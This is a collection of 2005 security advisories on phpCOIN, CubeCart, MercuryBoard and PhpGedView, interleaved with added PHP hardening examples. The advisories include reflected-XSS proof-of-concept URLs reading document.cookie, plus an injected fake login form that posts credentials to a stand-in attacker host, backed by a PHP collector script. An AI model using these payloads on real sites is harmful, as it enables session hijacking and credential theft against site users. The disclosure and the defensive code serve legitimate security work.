phpcoin phpinfo information disclosure

Monday, February 28, 2005
#######################################
phpcoin phpinfo information disclosure
vendor url: http://www.phpcoin.com/
vendor notified: yes   exploit available: yes
advisory: http://lostmon.blogspot.com/2005/03/phpcoin-phpinfo-information-disclosure.html
OSVDB ID: 14257
#######################################

phpCOIN is a free software package originally designed for web-hosting resellers to handle clients, orders, invoices,
notes and helpdesk, but it is no longer limited to hosting resellers.

In a default installation phpCOIN ships a file called 'phpinfo.php'.
Any remote user can request this file and obtain detailed information
about the PHP configuration and the server.



versions affected:

1.2.0
1.2.1b
1.2.1

exploit:

http://[target]/phpcoin_directory/phpinfo.php

solution:

For phpinfo: after the phpCOIN installation, delete this file :)

Sincerely:
Lostmon (lostmon@gmail.com)

Thanks to Estrella for being my light
Thanks to all who believed in me

--
Curiosity is what moves the mind...

CubeCart 2.0.x multiple variable XSS attacks and path disclosure

Friday, February 25, 2005
########################################################
CubeCart 2.0.x multiple variable XSS and path disclosure
vendor: Devellion Limited
vendor url: http://www.cubecart.com
vendor confirmed: yes   exploit available: yes
advisory: http://lostmon.blogspot.com/2005/02/cubecart-20x-multiple-variable-xss.html
vendor solution: http://www.cubecart.com/site/forums/index.php?showtopic=6032
Related OSVDB ID: 14062 13810
Secunia: SA14416
Securitytracker: 1013304
#########################################################


CubeCart contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate some variables upon submission to some scripts. This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
The 'admin/Settings.inc.php' script is included by all of these files, and it is the one that fails to validate the values passed to the other files through these variables.



##################
variables affected:
##################

cat_id
PHPSESSID
view_doc
product
session
catname
search
page

###########################
possible files affected by XSS:
###########################

forgot_pass.php
index.php
login.php
logout.php
new_pass.php
register.php
sale_cat.php
search.php
tellafriend.php
view_doc.php
view_order.php
view_product.php
your_links.php
your_orders.php

##############################
path disclosure, files affected:
##############################

PoC = http://[Target]/path_to_store/cat_navi.php

information.php
language.php
list_docs.php
popular_prod.php
sale.php
subfooter.inc.php
subheader.inc.php
cat_navi.php

###################
versions affected:
###################

2.0.0
2.0.1
2.0.2
2.0.3
2.0.4
2.0.5
2.0.6 Not affected.


#####################################################
Some proof of concept, but there are moooore !!!! :/
#####################################################

http://[Target]/path_to_store/?"><script>alert(document.cookie);</script>

http://[Target]/path_to_store/view_order.php?cat_id=1"><script>alert(document.cookie);</script>

http://[Target]/path_to_store/forgot_pass.php?catname='pruebas1'"><script>alert(document.cookie);</script>

http://[Target]/path_to_store/index.php?cat_id=5"><body><p><h1>CubeCart XSS Pow@ !!!</h1></p>/<body>

http://[Target]/path_to_store/view_order.php?session=1"><script>alert(document.cookie);</script>

http://[Target]/path_to_store/view_order.php?product=1"><script>alert(document.cookie);</script>

http://[Target]/path_to_store/your_orders.php?cat_id="><script>document.write(document.cookie)</script>

http://[Target]/path_to_store/view_product.php?product=1"><script>alert(document.cookie);</script>

http://[Target]/path_to_store/tellafriend.php?product=1&session="><script>alert(document.cookie)</script>

http://[Target]/path_to_store/tellafriend.php?product=1"><script>document.write(document.cookie)</script>

http://[Target]/path_to_store/login.php?session="><script>alert(document.cookie);</script>




http://[Target]/path_to_store/search.php?search=%22%3E%3Cform%20action=http://[Attacker]/savedb.php%20method=post%3EUsername:%3Cinput%20name=username%20type=text%20maxlength=30%3EPassword:%3Cinput%20name=password%20type=text%20maxlength=30%3E%3Cinput%20name=Login%20type=submit%20value=Login%3E%3C/form>

http://[Target]/path_to_store/tellafriend.php?product=1%22%3E%3Cform%20action=http://[Attacker]/savedb.php%20method=post%3EUsername:%3Cinput%20name=username%20type=text%20maxlength=30%3EPassword:%3Cinput%20name=password%20type=text%20maxlength=30%3E%3Cinput%20name=Login%20type=submit%20value=Login%3E%3C/form%3E



###########################
proof of concept savedb.php
###########################

<?
$lala = fopen("tostada.txt","a+");
fwrite($lala,"username:".$username."|"."Password:".$password."|");
fclose($lala);
header("Location:http://[target]/path_to_store/login.php");
exit();
?>

#############################

Change the variable for another vulnerable one, or for another file & variable;
so many of them are vulnerable :P

solution :

1- upgrade to version 2.0.6

1.1- To fix the path disclosure issue, the vendor released a fix on
2005-02-21. CubeCart 2.0.6 is not affected; upgrade your store or apply the fix.

1.2- To fix most of the XSS flaws you need to update your store to 2.0.6 and wait for all the changes, or apply the fix manually.


#################
release time:
#################


discovered: 2005-02-15
vendor notified: 2005-02-15
vendor response: 2005-02-15
path disclosure fix: 2005-02-21
XSS fix: 2005-02-25
disclosure date: 2005-02-25



Sincerely

Lostmon (lostmon@gmail.com)

Thanks to Estrella for being my light
Thanks to www.hispanew.com for support
Thanks to the CubeCart team, good response & good work !!
Thanks to http://www.osvdb.org

blog: http://lostmon.blogspot.com/



Mercuryboard forum.php f variable XSS

Wednesday, February 16, 2005
################################################
Mercuryboard 1.0.x & 1.1.x forum.php f variable XSS
vendor url: http://www.mercuryboard.com
advisory: http://lostmon.blogspot.com/2005/02/mercuryboard-forumphp-f-variable-xss.html
exploit available: yes   vendor: emailed
OSVDB ID: 13764
Secunia: SA13937
Securitytracker: 1013223
################################################


MercuryBoard is a powerful message board system dedicated to raw speed with a mixture of features, ease of use, and ease of customization coupled with expandability, and diverse language services.

MercuryBoard contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate the 'f' variable upon submission to the 'forum.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

affected versions:

1.0.x
1.1.x


Proof of concept

http://[victim]/index.php?a=forum&f='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/index.php?a=forum&f='><script>alert(document.cookie)</script>
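The CubeCart and MercuryBoard reflections above share one root cause: a query-string value is written straight into the page. The following is an added example, not code from either project, showing that pattern beside a hardened version; the function names and the sample request are constructed for illustration.

```php
<?php
// Added example, not CubeCart or MercuryBoard code: the echo-the-parameter
// pattern behind the reflected XSS above, beside a hardened version.
// Function names and the sample request are constructed for illustration.
declare(strict_types=1);

// Vulnerable: the raw query-string value is pasted into HTML. A value that
// contains '> or "> closes the attribute and whatever follows is parsed as
// markup, which is exactly what the proofs of concept above rely on.
function render_forum_link_unsafe(array $query): string
{
    $f = $query['f'] ?? '';
    return '<a href="index.php?a=forum&f=' . $f . '">Forum ' . $f . '</a>';
}

// Hardening step 1: validate against the type the script expects. A forum
// id is a small positive integer, so anything else is refused up front and
// the rejected value is never echoed back (an error page that repeats the
// input would only be another reflection point).
function forum_id_from_query(array $query): ?int
{
    $raw = $query['f'] ?? null;
    if (!is_string($raw) || !preg_match('/^[1-9][0-9]{0,8}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Hardening step 2: encode every value at the point it is written into HTML.
// ENT_QUOTES covers both quote styles, so a value cannot break out of a
// single- or double-quoted attribute; ENT_SUBSTITUTE avoids returning an
// empty string for malformed UTF-8. Free-text parameters that cannot be
// type-checked (search terms, catname) get this treatment at a minimum.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_forum_link_safe(int $f, string $label): string
{
    return '<a href="index.php?a=forum&f=' . $f . '">' . h($label) . '</a>';
}

// Constructed request, modelled on the proof of concept above.
$query = ['f' => "'><script>alert(document.cookie)</script>"];

// The injected tag survives untouched in the unsafe rendering.
echo "unsafe:    ", render_forum_link_unsafe($query), "\n";

// The validating path never renders the value at all.
$id = forum_id_from_query($query);
if ($id === null) {
    echo "validated: request rejected, 'f' is not a forum id\n";
} else {
    echo "validated: ", render_forum_link_safe($id, 'Forum ' . $id), "\n";
}

// The same payload through the encoder: quote and angle brackets become
// entities, so the browser shows them as text instead of executing them.
echo "encoded:   ", h($query['f']), "\n";
```

Run it with `php example.php`; the three lines printed make the difference visible. Validation first and encoding always is the rule: the integer check stops the forum id case outright, and the encoder is what protects the parameters (search, catname, session) that legitimately carry arbitrary text.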

impact:

Loss of confidentiality
Information disclosure
path disclosure
input manipulation.

solution:

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.


release time :

discovered : 2005-02-13
Email to vendor: 2005-02-13
disclosure date: 2005-02-16

Sincerely:

Lostmon (lostmon@gmail.com)

Thanks to Estrella, I love you lots :P
thanks to all for the support.

http://lostmon.blogspot.com/


Mercuryboard debug information disclosure

Monday, February 14, 2005
################################################
Mercuryboard 1.0.x & 1.1.x debug information disclosure
vendor url: http://www.mercuryboard.com
advisory: http://lostmon.blogspot.com/2005/02/mercuryboard-debug-information.html
OSVDB ID: 13787
exploit available: yes   vendor: emailed
Secunia: SA14284
Securitytracker: 1013626
################################################


MercuryBoard is a powerful message board system dedicated to raw speed with a mixture of features, ease of use, and ease of customization coupled with expandability, and diverse language services.


MercuryBoard contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when any user manipulates the inputs in the URL and appends \&debug=1 or concatenates &debug=1, which discloses all SQL queries, all files in use, the installation path and the templates used, resulting in a loss of confidentiality.

affected versions:

1.0.x
1.1.x
1.1.3 not affected

Proof of concept

http://[target]/index.php?a=forum&f=\&debug=1
http://[target]/index.php?a=\&debug=1
http://[target]/index.php?a=&debug=1
http://[target]/index.php?a=forum&debug=1
http://[target]/index.php?c=&debug=1

impact:

Loss of confidentiality
Information disclosure
path disclosure
input manipulation.

solution:

You need to update to version 1.1.3; this issue is solved in that version.

release time :

Discovered : 2005-02-13
Email to vendor: 2005-02-13
disclosure date: 2005-02-14
updated : 2005-04-02
Sincerely:

Lostmon (lostmon@gmail.com)

Thanks to Estrella, I love you lots :P
thanks to http://www.hispanew.com for support.
http://lostmon.blogspot.com/

Multiple full path disclosure in phpGedview 3.2 and prior

Tuesday, February 01, 2005
Multiple full path disclosure in phpGedview 3.2 and prior:

PhpGedView is a web-based family tree for indexing and ordering all genealogical entries;
a user can browse and present the information through different queries.

This application has various input validation errors
and reveals some data to remote users.

#######################################################
variables 'level' and 'parent[0]' in file 'placelist.php'
#######################################################

if we change the value of the variable 'level' to one that does not exist...

http://[target]/phpGedView/placelist.php?level=01
http://[target]/phpGedView/placelist.php?level=4000000000
(the number is the number of error lines shown)

if we change the index of the array variable 'parent[0]' to a non-existent
index... or to a letter

http://[target]/phpGedView/placelist.php?action=show&level=1&parent[1]=Click+edit+and+change+me

http://[target]/phpGedView/placelist.php?action=show&parent[x]=Misnaged&level=0

http://dismarking.freefronthost.com/phpGedView/placelist.php?action=find&level=1&parent[x]=Click+edit+and+change+me

here, if we change the variable 'level' we obtain the error again

http://[target]/phpGedView/placelist.php?action=show&parent[x]=Misnaged&level=4000 (level=4000 is the number of error lines shown)

we can make some combinations...
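The path disclosures in these advisories come from three habits: PHP notices printed to the browser (the 'level' and 'parent[x]' requests above), a debug switch honoured from the query string (the MercuryBoard &debug=1 post), and include-only files that can be requested directly (the CubeCart cat_navi.php case). The following added example, which is not code from PhpGedView, MercuryBoard or CubeCart, shows each beside its fix; the constant, function and option names and the sample requests are constructed.

```php
<?php
// Added example, not from CubeCart, MercuryBoard or PhpGedView: the three
// ways the advisories above leak the installation path, each beside its
// fix. Constant, function and option names are constructed for illustration.
declare(strict_types=1);

// 1. PHP notices ("Undefined offset ... in /home/site/public_html/placelist.php
//    on line N") are what the level= and parent[x]= requests above provoke.
//    Keep reporting on, but route it to the log rather than the response.
function configure_error_output(bool $production): void
{
    error_reporting(E_ALL);
    ini_set('display_errors', $production ? '0' : '1');
    ini_set('log_errors', '1');
}

// 2. Debug output is a deployment setting, not a request parameter. A
//    visitor appending &debug=1 gets nothing; even an administrator only
//    sees the query log when the configuration flag is on as well.
function debug_enabled(array $config, bool $is_admin, array $query): bool
{
    unset($query);                           // the request has no say here
    return ($config['debug'] ?? false) === true && $is_admin;
}

// 3. Include-only files (cat_navi.php, subheader.inc.php and friends)
//    requested directly run without the variables the entry script sets,
//    and the resulting notices print the path. The entry script defines a
//    constant; every include checks for it before doing anything else.
const IN_APP = true;                         // set by index.php in practice
function require_entry_point(): void
{
    if (!defined('IN_APP')) {
        http_response_code(403);
        exit('Direct access is not permitted.');
    }
}

// 4. Parse numeric input strictly and bound it. 'level=01' and
//    'level=4000000000' both survive a bare (int) cast; the advisory notes
//    that the number of error lines grows with the value, so the bound
//    matters as much as the type.
function parse_level(array $query, int $max_level = 10): ?int
{
    $raw = $query['level'] ?? null;
    if (!is_string($raw) || !preg_match('/^(0|[1-9][0-9]{0,2})$/', $raw)) {
        return null;
    }
    $level = (int) $raw;
    return $level <= $max_level ? $level : null;
}

// parent[] is indexed by level: indexes 0 .. level-1 must all be present
// strings, otherwise the script reads an undefined offset. parent[x] or
// parent[1] with level=1 therefore fail here instead of in the page body.
function parse_parents(array $query, int $level): ?array
{
    $parents = $query['parent'] ?? [];
    if (!is_array($parents)) {
        return null;
    }
    $out = [];
    for ($i = 0; $i < $level; $i++) {
        if (!isset($parents[$i]) || !is_string($parents[$i])) {
            return null;
        }
        $out[] = $parents[$i];
    }
    return $out;
}

configure_error_output(true);
require_entry_point();

// Constructed requests modelled on the proofs of concept above.
$samples = [
    ['level' => '1', 'parent' => [0 => 'Madrid']],
    ['level' => '01'],
    ['level' => '4000000000'],
    ['level' => '1', 'parent' => [1 => 'Click edit and change me']],
    ['level' => '0', 'parent' => ['x' => 'Misnaged']],
];
foreach ($samples as $q) {
    $level   = parse_level($q);
    $parents = $level === null ? null : parse_parents($q, $level);
    printf("%-50s => %s\n", urldecode(http_build_query($q)),
        $parents === null ? 'rejected' : "level $level, parents [" . implode(', ', $parents) . ']');
}

printf("anonymous &debug=1 with config debug off => %s\n",
    debug_enabled(['debug' => false], false, ['debug' => '1']) ? 'shown' : 'hidden');
```

Note that the last sample (level=0 with a stray parent[x]) is accepted with an empty parent list: the script never reads parent[x], so the bogus index is harmless once the loop is bounded by a validated level. The first measure is the one that matters most in production, because display_errors=0 turns every remaining mistake into a log line instead of a path leak.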

###########################################################
variable 'pids[0]' in file timeline.php
###########################################################

if we change the value of the array 'pids[0]' to a non-existent number
or to a letter, we get the error again.

http://[target]/phpGedView/timeline.php?pids[x]=I2222


###########################################################
variable not defined in file 'help_text.php'
###########################################################

in this file, to cause an error we only need to invent a variable
(in the example, 'lala')

http://[target]/bin/phpgedview/help_text.php?lala=lala

and we get the full path disclosure again.


############################################################
variable 'filename' in 'imageview.php'
############################################################

the variable 'filename' is not validated properly and permits importing
files from other sites.

http://[target]/imageview.php?filename=http://[remote]/logo.gif

and we can obtain the full installation path again

http://[target]/imageview.php?filename=../ or some other invalid data.



############################################################
changing the language name to a number crashes the session
############################################################

when we change to another language, at the end of the URL we
have the name of the language in use.
If we change this value to a number we crash the session,
and the full path is revealed.

http://[target]/phpGedView/individual.php?pid=I1&ged=pruebas2.ged&changelanguage=yes&NEWLANGUAGE=1
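Both the 'filename' parameter of imageview.php and the NEWLANGUAGE value end up selecting a file on disk, and both break the same way: the value is used before it is checked against what the application actually offers. The following added example, which is not PhpGedView code, shows an allowlisting approach for each; the directory layout, function names and sample files are constructed.

```php
<?php
// Added example, not PhpGedView code: how an imageview-style script can
// accept a filename, and a language switcher a language name, without
// opening either to remote URLs, traversal or a crash that prints the path.
// Directory layout, function names and the sample files are constructed.
declare(strict_types=1);

// Resolve the requested name inside the media directory and refuse anything
// that does not land there: URLs (http://...), absolute paths, ../ climbs and
// names that do not exist. realpath() canonicalises the candidate; the
// prefix check is the actual containment test.
function resolve_media_file(string $media_dir, string $requested): ?string
{
    $base = realpath($media_dir);
    if ($base === false) {
        return null;
    }
    // Only a plain file name with a known image extension is ever accepted;
    // this alone drops "http://", "../" and "/etc/passwd".
    if (!preg_match('/^[A-Za-z0-9_-]+\.(gif|jpe?g|png)$/i', $requested)) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Defence in depth: even if the pattern above were loosened later, the
    // resolved path still has to sit under the media directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// The language name picks a language file; a number or any other unknown
// value must fall back to the default instead of loading nothing and
// breaking the session. The list is the allowlist, not the filesystem.
function select_language(?string $requested, array $available, string $default): string
{
    if ($requested !== null && in_array($requested, $available, true)) {
        return $requested;
    }
    return $default;
}

// Constructed sandbox: a temporary media directory holding one real image.
$media = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'media_' . getmypid();
mkdir($media, 0700);
file_put_contents($media . DIRECTORY_SEPARATOR . 'logo.gif', 'GIF89a');

// Requests modelled on the advisory, plus a plain missing file.
$requests = [
    'logo.gif',
    'http://[remote]/logo.gif',
    '../',
    '../../etc/passwd',
    'missing.png',
];
foreach ($requests as $r) {
    $resolved = resolve_media_file($media, $r);
    printf("filename=%-26s => %s\n", $r,
        $resolved === null ? 'rejected' : 'serve ' . basename($resolved));
}

$languages = ['english', 'spanish', 'french'];
foreach (['spanish', '1', null] as $lang) {
    printf("NEWLANGUAGE=%-8s => %s\n", var_export($lang, true),
        select_language($lang, $languages, 'english'));
}

unlink($media . DIRECTORY_SEPARATOR . 'logo.gif');
rmdir($media);
```

The regular expression does most of the work and the realpath prefix check catches whatever a future edit to that expression lets through; neither alone is enough, since a loosened pattern or a symlink inside the media directory would defeat one without the other. The language switch deliberately never touches the filesystem to decide: the application's own list is the only source of valid names.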


############################################################


Sincerely
Lostmon (lostmon@gmail.com)
thanks to Estrella for being my light
thanks to everyone who believes in me
 
